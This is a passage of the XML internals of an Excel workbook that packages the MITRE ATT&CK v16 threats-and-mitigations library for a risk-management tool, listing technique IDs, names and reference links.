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nDoloir\Desktop\Repos\intuitem\ciso-assistant-community\tools\excel\mitre\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0AF7A176-374E-479E-AF2D-8E7C1E419725}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="1485" yWindow="-15870" windowWidth="25440" windowHeight="15990" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="library_meta" sheetId="1" r:id="rId1"/>
    <sheet name="Mitre threats_meta" sheetId="2" r:id="rId2"/>
    <sheet name="Mitre threats_content" sheetId="3" r:id="rId3"/>
    <sheet name="Mitre mitigations_meta" sheetId="4" r:id="rId4"/>
    <sheet name="Mitre mitigations_cont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G14" i="5"/>
  <c r="G26" i="5"/>
  <c r="G38" i="5"/>
  <c r="G3" i="5"/>
  <c r="G15" i="5"/>
  <c r="G27" i="5"/>
  <c r="G39" i="5"/>
  <c r="G4" i="5"/>
  <c r="G16" i="5"/>
  <c r="G28" i="5"/>
  <c r="G40" i="5"/>
  <c r="G5" i="5"/>
  <c r="G20" i="5"/>
  <c r="G35" i="5"/>
  <c r="G7" i="5"/>
  <c r="G22" i="5"/>
  <c r="G37" i="5"/>
  <c r="G6" i="5"/>
  <c r="G24" i="5"/>
  <c r="G44" i="5"/>
  <c r="G8" i="5"/>
  <c r="G25" i="5"/>
  <c r="G45" i="5"/>
  <c r="G9" i="5"/>
  <c r="G31" i="5"/>
  <c r="G10" i="5"/>
  <c r="G32" i="5"/>
  <c r="G11" i="5"/>
  <c r="G36" i="5"/>
  <c r="G12" i="5"/>
  <c r="G41" i="5"/>
  <c r="G13" i="5"/>
  <c r="G17" i="5"/>
  <c r="G18" i="5"/>
  <c r="G19" i="5"/>
  <c r="G21" i="5"/>
  <c r="G23" i="5"/>
  <c r="G29" i="5"/>
  <c r="G30" i="5"/>
  <c r="G33" i="5"/>
  <c r="G34" i="5"/>
  <c r="G42" i="5"/>
  <c r="G43" i="5"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3038" uniqueCount="2822">
  <si>
    <t>type</t>
  </si>
  <si>
    <t>library</t>
  </si>
  <si>
    <t>urn</t>
  </si>
  <si>
    <t>urn:intuitem:risk:library:mitre-attack</t>
  </si>
  <si>
    <t>version</t>
  </si>
  <si>
    <t>locale</t>
  </si>
  <si>
    <t>en</t>
  </si>
  <si>
    <t>ref_id</t>
  </si>
  <si>
    <t>mitre-attack</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>Mitre ATT&amp;CK v16 - Threats and mitigations</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>copyright</t>
  </si>
  <si>
    <t>Terms of Use
LICENSE
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2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation."
DISCLAIMERS
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t>
  </si>
  <si>
    <t>provider</t>
  </si>
  <si>
    <t>Mitre ATT&amp;CK</t>
  </si>
  <si>
    <t>packager</t>
  </si>
  <si>
    <t>intuitem</t>
  </si>
  <si>
    <t>threats</t>
  </si>
  <si>
    <t>base_urn</t>
  </si>
  <si>
    <t>urn:intuitem:risk:threat:mitre-attack</t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
    <t>T1205.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1205/002</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1560/001</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</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</si>
  <si>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https://attack.mitre.org/techniques/T1047</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1113</t>
  </si>
  <si>
    <t>T1027.011</t>
  </si>
  <si>
    <t>Fileless Storage</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/011</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</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</si>
  <si>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
https://attack.mitre.org/techniques/T1037</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1557</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure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</si>
  <si>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https://attack.mitre.org/techniques/T1583</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/011</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>Container and Resource Discovery</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1613</t>
  </si>
  <si>
    <t>T1583.007</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>T1027.009</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1578/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1592</t>
  </si>
  <si>
    <t>T1596.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>T1564.012</t>
  </si>
  <si>
    <t>File/Path Exclusions</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</si>
  <si>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https://attack.mitre.org/techniques/T1564/012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1222/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1129</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1602</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1213/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>T1588.007</t>
  </si>
  <si>
    <t>Artificial Intelligence</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1588/007</t>
  </si>
  <si>
    <t>T1666</t>
  </si>
  <si>
    <t>Modify Cloud Resource Hierarchy</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</si>
  <si>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https://attack.mitre.org/techniques/T1666</t>
  </si>
  <si>
    <t>T1564.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/008</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <t>T1027.013</t>
  </si>
  <si>
    <t>Encrypted/Encoded File</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</si>
  <si>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
https://attack.mitre.org/techniques/T1027/013</t>
  </si>
  <si>
    <t>T1590.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1499/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>T1485.001</t>
  </si>
  <si>
    <t>Lifecycle-Triggered Deletion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</si>
  <si>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https://attack.mitre.org/techniques/T1485/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1123</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</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</si>
  <si>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https://attack.mitre.org/techniques/T1543</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1133</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>T1053.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1568/002</t>
  </si>
  <si>
    <t>T1036.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1548/002</t>
  </si>
  <si>
    <t>T1496.003</t>
  </si>
  <si>
    <t>SMS Pumping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</si>
  <si>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https://attack.mitre.org/techniques/T1496/003</t>
  </si>
  <si>
    <t>T1016.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1548/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1560/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>T1584.008</t>
  </si>
  <si>
    <t>Network Devices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</si>
  <si>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https://attack.mitre.org/techniques/T1584/008</t>
  </si>
  <si>
    <t>T1583.008</t>
  </si>
  <si>
    <t>Malvertising</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1583/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>T1596.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542/001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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1594</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1069/003</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1499/003</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t>T1588.004</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</si>
  <si>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
https://attack.mitre.org/techniques/T1588/004</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1561</t>
  </si>
  <si>
    <t>T1071.004</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</si>
  <si>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https://attack.mitre.org/techniques/T1071/004</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>Securityd Memory</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</si>
  <si>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https://attack.mitre.org/techniques/T1555/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1615</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1542/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>T1218.013</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/013</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>T1036.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>T1587.003</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</si>
  <si>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
https://attack.mitre.org/techniques/T1587/003</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1110/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>Keychain</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1555/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1003/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1600</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1606/002</t>
  </si>
  <si>
    <t>T1036.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>T1587.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1587/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1652</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1087/002</t>
  </si>
  <si>
    <t>T1547.014</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1559/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1204/002</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1591/003</t>
  </si>
  <si>
    <t>T1071.005</t>
  </si>
  <si>
    <t>Publish/Subscribe Protocols</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</si>
  <si>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https://attack.mitre.org/techniques/T1071/005</t>
  </si>
  <si>
    <t>T1592.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/001</t>
  </si>
  <si>
    <t>T1080</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1080</t>
  </si>
  <si>
    <t>T1484.002</t>
  </si>
  <si>
    <t>Trust Modification</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</si>
  <si>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https://attack.mitre.org/techniques/T1484/002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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1573/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1586/001</t>
  </si>
  <si>
    <t>T1562.009</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1542/005</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1543/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1568/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1053/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>T1588.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1588/006</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1566/002</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1070/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1137</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/004</t>
  </si>
  <si>
    <t>T1598.003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</si>
  <si>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https://attack.mitre.org/techniques/T1598/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/004</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Spearphishing Attachment</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</si>
  <si>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https://attack.mitre.org/techniques/T1566/001</t>
  </si>
  <si>
    <t>T1027.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1559/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1119</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/005</t>
  </si>
  <si>
    <t>T1555.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/001</t>
  </si>
  <si>
    <t>T1608.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1608/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Network Sniffing</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</si>
  <si>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
https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1553/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1530</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1565/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1552/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1135</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1120</t>
  </si>
  <si>
    <t>T1036.009</t>
  </si>
  <si>
    <t>Break Process Trees</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1036/009</t>
  </si>
  <si>
    <t>T1590.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/004</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1587/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>Add-ins</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1137/006</t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1505/002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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1082</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1071</t>
  </si>
  <si>
    <t>T1574.014</t>
  </si>
  <si>
    <t>AppDomainManager</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</si>
  <si>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https://attack.mitre.org/techniques/T1574/014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>T1098.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/003</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1498/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/002</t>
  </si>
  <si>
    <t>T1505.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1505/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1499/002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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1195/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1106</t>
  </si>
  <si>
    <t>T1558.005</t>
  </si>
  <si>
    <t>Ccache Files</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1558/005</t>
  </si>
  <si>
    <t>T1070.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1584/003</t>
  </si>
  <si>
    <t>T1059.010</t>
  </si>
  <si>
    <t>AutoHotKey &amp; AutoIT</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</si>
  <si>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
https://attack.mitre.org/techniques/T1059/010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1600/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1202</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1140</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1137/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562</t>
  </si>
  <si>
    <t>T1586.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1586/003</t>
  </si>
  <si>
    <t>T1586.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1586/002</t>
  </si>
  <si>
    <t>T1098.007</t>
  </si>
  <si>
    <t>Additional Local or Domain Groups</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</si>
  <si>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
https://attack.mitre.org/techniques/T1098/007</t>
  </si>
  <si>
    <t>T1608.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1195</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1190</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</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</si>
  <si>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https://attack.mitre.org/techniques/T1555</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1567</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1219</t>
  </si>
  <si>
    <t>T1583.001</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1560/002</t>
  </si>
  <si>
    <t>T1055.003</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>T1070.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1070/008</t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Login Hook</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1037/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1659</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>Process Injection</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</si>
  <si>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https://attack.mitre.org/techniques/T1055</t>
  </si>
  <si>
    <t>T1567.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1567/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>T1021.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Timestomp</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</si>
  <si>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
